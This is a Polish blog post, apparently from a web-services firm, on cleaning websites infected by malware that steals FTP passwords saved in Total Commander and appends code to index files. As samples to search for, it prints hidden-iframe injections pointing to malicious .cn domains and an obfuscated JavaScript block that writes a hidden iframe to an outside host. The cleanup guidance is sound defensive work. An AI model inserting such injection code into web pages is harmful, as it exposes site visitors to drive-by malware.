virus pcOstatnimi czasy coraz więcej klientów / ludzi „skarży” się na wirusy na swoich stronach internetowych – nie są to typowe „wirusy” a „po prostu” kawałek kodu źródłowego, który dopisuje się do plików index.php, index.html … itd

Pewnie zastanawia to Państwa jakim cudem się ten wirus dostał się na stronę?

Więc jest to powodem zawirusowanego systemu operacyjnego i zawartego hasła do serwera FTP w programie Total Commander, który niestety jest podatny na tego typu zabieg. Wirus sprawdza wszystkie konta FTP zapisane w programie i jeżeli ma możliwość zalogować się na daną stronę , loguje się a następnie wyszukuje typowe nazwy plików (np. index.php, index.html … ) i na końcu kodu dopisuje kilka linijek swojego kodu, który raz ma postać <iframe> a innym razem jako zaawansowany kawałek kodu JavaScript.

W wynikach wyszukiwania Google, często można znaleźć strony przy który jest napisane „Ta witryna może wyrządzić szkody na twoim komputerze” to oznacza, że dana strona właśnie posiada dopisany tego typu kod.

Jak usunąć tego wirusa?

  1. Po pierwsze i najważniejsze – od razu zmienić hasło do serwera FTP i nie zapisywać go w Total Commanderze (najlepiej go podawać podczas logowania, bądź po prostu skorzystać z innego oprogramowania, które jest wiele…)
  2. Zalogować się na serwer FTP i skopiować wszystkie pliki na swój lokalny dysk (komputer)
  3. Lokalnie na komputerze przeglądnąć wszystkie pliki poszukując kodu pokroju:

<iframe src=”http://mixante.cn/in.cgi?income55″ width=1 height=1 style=”visibility: hidden”></iframe>
<iframe src=”http://cheapslotplay.cn/in.cgi?income48″ width=1 height=1 style=”visibility: hidden”></iframe>
… itd

Zależność jest jedna – wyraz – „income” i w poszukiwaniu takiego wyrazu na początek zalecamy się skupić, gdy tylko znajdą Państwo tego typu kod, należy go usunąć i wgrać plik na serwer FTP nadpisując stary.

Drugim rodzajem „wirusa” może być kod podobny do:

<!– ad –><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=””;
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=””;
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” „;
cvtot=”</”;
qtndm=””;
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=””;
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=””;
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” „;
cvtot=”</”;
qtndm=””;
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+”e='”+”v”+”isib”);
hzpmf=(0x587,qxaol+ldlvw+”li”+zfhuu+hvkhb+”id”+hbqmm+”en”+”'”+hauzn);
rmtyf=(6.5e1,””);

aaa=((567,gftzo),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486).2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,””+”<„+sjgbi+rpygo+”a”)+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+”'”+”h”+”ttp”+””)+(8581.<.887?0.7:”://t”+”ruittbros.n”)+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+”>”+cvtot+”if”+qtndm)+(2.>1.?”ram”+”e>”:64.)+(223.>=jlooz?1.:rmtyf)));</script><!– /ad –><!DOCTYPE html PUBLIC „-//W3C//DTD XHTML 1.0 Transitional//EN” „http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>

Proszę mieć na uwadze, że to w żadnym przypadku nie jest wina hostingu, obojętnie czy to będzie nazwa.pl, home.pl czy inna firma hostingowa (aczkolwiek istnieją skrajne przypadki…).

Po usunięciu w/w kodów i wgraniu ich na serwer FTP strona powinna być już odkażona :-)

W razie problemów (czy też braku umiejętności) z usunięciem wirusa, zapraszamy do kontaktu z nami.